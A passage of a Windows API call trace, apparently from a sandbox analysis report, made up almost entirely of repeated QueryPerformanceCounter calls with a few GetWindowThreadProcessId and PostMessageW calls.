lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097844542652) returned 1 [0159.652] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097847154173) returned 1 [0159.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097847168698) returned 1 [0159.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097848014582) returned 1 [0159.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097848087020) returned 1 [0159.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097849300300) returned 1 [0159.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097849314088) returned 1 [0159.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097850875102) returned 1 [0159.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097850888482) returned 1 [0159.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097852471603) returned 1 [0159.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097852487118) returned 1 [0159.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097854078020) returned 1 [0159.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097854094043) returned 1 [0159.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097855824050) returned 1 [0159.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097855841408) returned 1 [0159.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097857316193) returned 1 [0159.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097857333367) returned 1 [0159.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097858872884) returned 1 [0159.770] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.770] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3677c038, lParam=0x3d09) returned 1 [0159.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097858907682) returned 1 [0159.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097860485954) returned 1 [0159.786] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.786] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3677ff3b, lParam=0x3d09) returned 1 [0159.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097860523591) returned 1 [0159.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097862078538) returned 1 [0159.802] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.802] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36783d71, lParam=0x3d09) returned 1 [0159.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097862133149) returned 1 [0159.818] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097863679668) returned 1 [0159.818] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.818] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36787bfc, lParam=0x3d09) returned 1 [0159.818] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097863719265) returned 1 [0159.834] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097865276226) returned 1 [0159.834] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.834] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3678ba5a, lParam=0x3d09) returned 1 [0159.834] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097865326850) returned 1 [0159.850] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097866875008) returned 1 [0159.850] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.850] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3678f8ce, lParam=0x3d09) returned 1 [0159.850] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097866915990) returned 1 [0159.866] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097868484127) returned 1 [0159.866] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.866] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x367937a9, lParam=0x3d09) returned 1 [0159.866] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097868524426) returned 1 [0159.882] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097870082560) returned 1 [0159.882] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.882] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36797619, lParam=0x3d09) returned 1 [0159.882] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097870124254) returned 1 [0159.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097871694111) returned 1 [0159.898] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.898] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3679b50d, lParam=0x3d09) returned 1 [0159.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097871732566) returned 1 [0159.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097873276193) returned 1 [0159.914] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.914] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3679f2d9, lParam=0x3d09) returned 1 [0159.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097873334351) returned 1 [0159.929] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097874836870) returned 1 [0159.929] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.930] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x367a2fd0, lParam=0x3d09) returned 1 [0159.930] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097874875201) returned 1 [0159.947] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097876572928) returned 1 [0159.947] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097876590749) returned 1 [0159.968] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097878741285) returned 1 [0159.969] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097878767007) returned 1 [0160.003] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097882221795) returned 1 [0160.004] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097882257564) returned 1 [0160.016] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097883502832) returned 1 [0160.016] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097883517249) returned 1 [0160.032] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097885109740) returned 1 [0160.032] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097885134412) returned 1 [0160.048] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097886733730) returned 1 [0160.048] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097886754380) returned 1 [0160.064] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097888306012) returned 1 [0160.064] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097888323973) returned 1 [0160.080] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097889910081) returned 1 [0160.080] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097889932763) returned 1 [0160.096] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097891531731) returned 1 [0160.096] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097891660169) returned 1 [0160.112] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097893130447) returned 1 [0160.112] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097893148186) returned 1 [0160.128] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097894737817) returned 1 [0160.128] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097894753674) returned 1 [0160.144] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097896313255) returned 1 [0160.144] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097896340645) returned 1 [0160.160] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097897904150) returned 1 [0160.160] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097897924733) returned 1 [0160.176] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097899526962) returned 1 [0160.176] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097899543841) returned 1 [0160.192] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097901094754) returned 1 [0160.192] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097901112269) returned 1 [0160.208] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097902704020) returned 1 [0160.208] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097902739605) returned 1 [0160.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097904297261) returned 1 [0160.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097904319089) returned 1 [0160.240] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097905893882) returned 1 [0160.240] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097905911104) returned 1 [0160.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097907482547) returned 1 [0160.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097907507008) returned 1 [0160.272] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097909079653) returned 1 [0160.272] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097909107774) returned 1 [0160.288] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097910678090) returned 1 [0160.288] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097910699633) returned 1 [0160.303] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097912247536) returned 1 [0160.304] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097912312293) returned 1 [0160.321] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097913965365) returned 1 [0160.321] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097913988907) returned 1 [0160.335] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097915446398) returned 1 [0160.336] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097915462925) returned 1 [0160.364] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097918258632) returned 1 [0160.364] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097918280833) returned 1 [0160.367] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097918646567) returned 1 [0160.368] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097918663767) returned 1 [0160.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097920263987) returned 1 [0160.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097920285485) returned 1 [0160.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097921855648) returned 1 [0160.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097921880472) returned 1 [0160.415] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097923449277) returned 1 [0160.416] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097923468461) returned 1 [0160.431] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097925049527) returned 1 [0160.432] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097925066296) returned 1 [0160.448] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097926654502) returned 1 [0160.448] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097926672451) returned 1 [0160.463] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097928242856) returned 1 [0160.464] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097928256664) returned 1 [0160.479] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097929842219) returned 1 [0160.480] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097929855996) returned 1 [0160.495] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097931447757) returned 1 [0160.496] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097931465370) returned 1 [0160.516] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097933550969) returned 1 [0160.517] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097933569254) returned 1 [0160.527] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097934600176) returned 1 [0160.527] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097934637813) returned 1 [0160.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097936194982) returned 1 [0160.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097936208265) returned 1 [0160.559] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097937801618) returned 1 [0160.559] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097937824738) returned 1 [0160.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097939533581) returned 1 [0160.577] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097939555766) returned 1 [0160.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097941072127) returned 1 [0160.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097941088054) returned 1 [0160.607] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097942642490) returned 1 [0160.608] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097942658874) returned 1 [0160.623] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097944244745) returned 1 [0160.624] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097944263120) returned 1 [0160.639] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097945854419) returned 1 [0160.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097945875818) returned 1 [0160.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097947750987) returned 1 [0160.659] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097947773866) returned 1 [0160.673] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097949204831) returned 1 [0160.673] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097949229680) returned 1 [0160.689] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097950796234) returned 1 [0160.689] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097950815444) returned 1 [0160.705] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097952397210) returned 1 [0160.705] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097952415144) returned 1 [0160.721] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097953997339) returned 1 [0160.721] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097954015364) returned 1 [0160.737] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097955599012) returned 1 [0160.737] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097955630823) returned 1 [0160.753] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097957211118) returned 1 [0160.753] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097957234591) returned 1 [0160.769] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097958805739) returned 1 [0160.769] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097958845188) returned 1 [0160.785] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097960401847) returned 1 [0160.785] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097960422994) returned 1 [0160.801] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097962002245) returned 1 [0160.801] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097962023746) returned 1 [0160.817] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097963575196) returned 1 [0160.817] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097963592190) returned 1 [0160.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097965179286) returned 1 [0160.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097965201273) returned 1 [0160.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097966776582) returned 1 [0160.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097966802330) returned 1 [0160.865] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097968370119) returned 1 [0160.865] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097968385351) returned 1 [0160.881] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097970036962) returned 1 [0160.882] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097970061511) returned 1 [0160.897] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097971618474) returned 1 [0160.897] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097971636387) returned 1 [0160.913] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097973222743) returned 1 [0160.913] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097973236914) returned 1 [0160.929] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097974837249) returned 1 [0160.930] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097974874613) returned 1 [0160.945] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097976419190) returned 1 [0160.945] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097976435980) returned 1 [0160.962] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097978142353) returned 1 [0160.963] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097978160122) returned 1 [0160.981] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097980021289) returned 1 [0160.981] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097980036681) returned 1 [0160.997] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097981617155) returned 1 [0160.997] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097981630668) returned 1 [0161.013] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097983220220) returned 1 [0161.013] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097983234667) returned 1 [0161.029] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097984817869) returned 1 [0161.029] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097984834126) returned 1 [0161.045] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097986424652) returned 1 [0161.045] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097986440338) returned 1 [0161.062] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097988149162) returned 1 [0161.063] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097988168558) returned 1 [0161.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097989593054) returned 1 [0161.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097989615492) returned 1 [0161.093] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097991174712) returned 1 [0161.093] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097991191564) returned 1 [0161.109] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097992773449) returned 1 [0161.109] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097992790100) returned 1 [0161.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097994377863) returned 1 [0161.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097994400430) returned 1 [0161.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097995968458) returned 1 [0161.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097995982790) returned 1 [0161.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097997569468) returned 1 [0161.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097997585610) returned 1 